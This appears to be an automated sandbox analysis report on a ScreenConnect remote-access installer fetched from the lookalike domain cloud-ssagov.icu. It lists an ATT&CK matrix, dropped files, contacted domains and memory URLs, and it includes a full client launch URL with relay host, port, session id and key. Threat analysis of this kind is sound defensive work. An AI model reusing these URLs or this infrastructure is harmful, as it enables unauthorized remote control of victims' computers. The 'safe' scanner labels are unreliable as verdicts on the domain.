Gather Victim Network Information	Server	Cloud Accounts	Launchd	1 Bootkit	1 Scheduled Task/Job	1 Timestomp	LSA Secrets	2 Process Discovery	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	71 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Search Order Hijacking	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Masquerading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Modify Registry	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	71 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	13 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Hidden Users	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	1 Bootkit	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

⊘No Antivirus matches

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.ClientService.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsBackstageShell.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsFileManager.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe91ad06\ScreenConnect.Core.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..dows_4b14c015c87c1ad8_0018.0003_none_57acc9dd3adfc036\ScreenConnect.Windows.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013\ScreenConnect.WindowsClient.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..ient_4b14c015c87c1ad8_0018.0003_none_e94a4fce0de1030a\ScreenConnect.Client.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..vice_4b14c015c87c1ad8_0018.0003_none_04888a4494511071\ScreenConnect.ClientService.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.Client.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.ClientService.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.ClientService.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.Core.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.Windows.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.WindowsBackstageShell.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.WindowsClient.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.WindowsFileManager.exe	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.manifest	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/Scre	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe.config	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsClient.exe.config	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.dllh~2e	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Win	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.e	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationScreenConnect.	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationh	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application%%%	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationgV	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.dll	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exe0	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicatione089	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.dll	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application4e089	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationL1LKA	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationX	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session	0%	Avira URL Cloud	safe
http://ocsp.digicert	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.configO9	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application5-21	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Core.dllv	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.dlllA6d	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationXN	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exe	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.exegA/d	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.applicatio	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileMana	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShe0	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.exe	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationil	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe.P	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application01(	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsClie	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.config%8	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Windows.dll	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application1934e089	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Cli	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsClient.e	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationil.37L	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/Scr2%	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsClient.exe	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=api.wisescreen.net	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationh9S	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.dll0h&	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.config	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationL37L	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Core.dll	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application561934e089	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.ClientServi	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false	high
api.wisescreen.net	185.49.126.73	true	false	unknown
cloud-ssagov.icu	185.49.126.73	true	false	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	high
171.39.242.20.in-addr.arpa	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.manifest	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsClient.exe.config	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe.config	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.dll	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.dll	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exe	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.exe	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.Windows.dll	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsClient.exe	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.Core.dll	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.config	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.fontbureau.com/designersG	dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloud-ssagov.icu/Bin/Scre	dfsvc.exe, 00000001.00000002.3532689918.000001ECBA44B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.e	dfsvc.exe, 00000001.00000002.3505558952.000001ECA033A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/?	dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers?	dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.dllh~2e	dfsvc.exe, 00000001.00000002.3530611036.000001ECBA226000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationScreenConnect.	ScreenConnect.WindowsClient.exe, 00000006.00000002.1943332035.000000001BB39000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationh	ScreenConnect.WindowsClient.exe, 00000006.00000002.1943332035.000000001BB39000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application%%%	dfsvc.exe, 00000001.00000002.3530611036.000001ECBA226000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1934162855.00000000014E8000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1943242866.000000001BB26000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV2.C:	edb.log.2.dr, qmgr.db.2.dr	false		high
https://cloud-ssagov.icu/Bin/ScreenConnect.Win	dfsvc.exe, 00000001.00000002.3505558952.000001ECA0382000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exe0	dfsvc.exe, 00000001.00000002.3524248459.000001ECB8710000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.goodfont.co.kr	dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application4e089	ScreenConnect.WindowsClient.exe, 00000006.00000002.1943332035.000000001BB39000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationgV	ScreenConnect.WindowsClient.exe, 00000006.00000002.1943332035.000000001BB39000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationL1LKA	dfsvc.exe, 00000001.00000002.3530611036.000001ECBA226000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicatione089	ScreenConnect.WindowsClient.exe, 00000006.00000002.1943332035.000000001BB39000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationX	ScreenConnect.WindowsClient.exe, 00000006.00000002.1935051701.000000000325F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.typography.netD	dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/Prod.C:	edb.log.2.dr, qmgr.db.2.dr	false		high
http://www.founder.com.cn/cn/cThe	dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/staff/dennis.htm	dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.digicert	dfsvc.exe, 00000001.00000002.3505558952.000001ECA02DA000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001EC9FF69000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g.live.com/odclientsettings/ProdV2	edb.log.2.dr, qmgr.db.2.dr	false		high
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.configO9	dfsvc.exe, 00000001.00000002.3532689918.000001ECBA44B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.xrml.org/schema/2001/11/xrml2coreS	dfsvc.exe, 00000001.00000002.3505558952.000001EC9FDBC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application5-21	ScreenConnect.WindowsClient.exe, 00000006.00000002.1943332035.000000001BB39000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application	dfsvc.exe, 00000001.00000002.3524248459.000001ECB8710000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3530611036.000001ECBA226000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001ECA009A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3503405101.000001EC9E331000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1935051701.000000000325F000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1933774164.000000000148F000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1935051701.0000000003251000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1943332035.000000001BB39000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.Core.dllv	dfsvc.exe, 00000001.00000002.3532689918.000001ECBA44B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.dlllA6d	dfsvc.exe, 00000001.00000002.3530611036.000001ECBA226000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloud-ssagov.icu	dfsvc.exe, 00000001.00000002.3505558952.000001ECA027B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001ECA0382000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001ECA04B9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001ECA0407000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001EC9FD31000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.w3.o	dfsvc.exe, 00000001.00000002.3505558952.000001ECA0174000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationXN	ScreenConnect.WindowsClient.exe, 00000006.00000002.1933774164.000000000148F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fonts.com	dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.urwpp.deDPlease	dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.zhongyicts.com.cn	dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	dfsvc.exe, 00000001.00000002.3505558952.000001EC9FD31000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000008.00000002.3505601572.00000000015B1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000E.00000002.2894133080.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.exegA/d	dfsvc.exe, 00000001.00000002.3530611036.000001ECBA226000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	svchost.exe, 00000002.00000003.1657089633.00000224B6582000.00000004.00000800.00020000.00000000.sdmp, edb.log.2.dr, qmgr.db.2.dr	false		high
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.applicatio	ScreenConnect.WindowsClient.exe, 00000006.00000002.1934240653.0000000001543000.00000004.00000020.00020000.00000000.sdmp, 86VMVS2K.log.1.dr	false	Avira URL Cloud: safe	unknown
http://crl3.digicert.c	Support.Client (1).exe, 00000000.00000002.2520570572.0000000000CDB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShe0	dfsvc.exe, 00000001.00000002.3505558952.000001ECA02F6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileMana	dfsvc.exe, 00000001.00000002.3505558952.000001ECA0382000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloud-ssagov.icu/Bin/ScreenConnect	dfsvc.exe, 00000001.00000002.3505558952.000001ECA04B9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application01(	dfsvc.exe, 00000001.00000002.3524248459.000001ECB8710000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsClie	dfsvc.exe, 00000001.00000002.3505558952.000001ECA0382000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe.P	dfsvc.exe, 00000001.00000002.3505558952.000001ECA033A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.xrml.org/schema/2001/11/xrml2core	dfsvc.exe, 00000001.00000002.3505558952.000001EC9FDBC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationil	dfsvc.exe, 00000001.00000002.3524248459.000001ECB8710000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3530611036.000001ECBA226000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.config%8	dfsvc.exe, 00000001.00000002.3532689918.000001ECBA44B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.w3.or	dfsvc.exe, 00000001.00000002.3505558952.000001ECA0197000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001ECA01FD000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001ECA009A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001ECA0174000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1943439615.000000001BB6C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.ver)	svchost.exe, 00000002.00000002.3289991348.00000224B668F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.12.dr	false		high
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application1934e089	ScreenConnect.WindowsClient.exe, 00000006.00000002.1943332035.000000001BB39000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloud-ssagov.icu/Bin/ScreenConnect.Cli	dfsvc.exe, 00000001.00000002.3505558952.000001ECA0407000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsClient.e	dfsvc.exe, 00000001.00000002.3505558952.000001ECA033A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationil.37L	dfsvc.exe, 00000001.00000002.3530611036.000001ECBA226000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	false		high
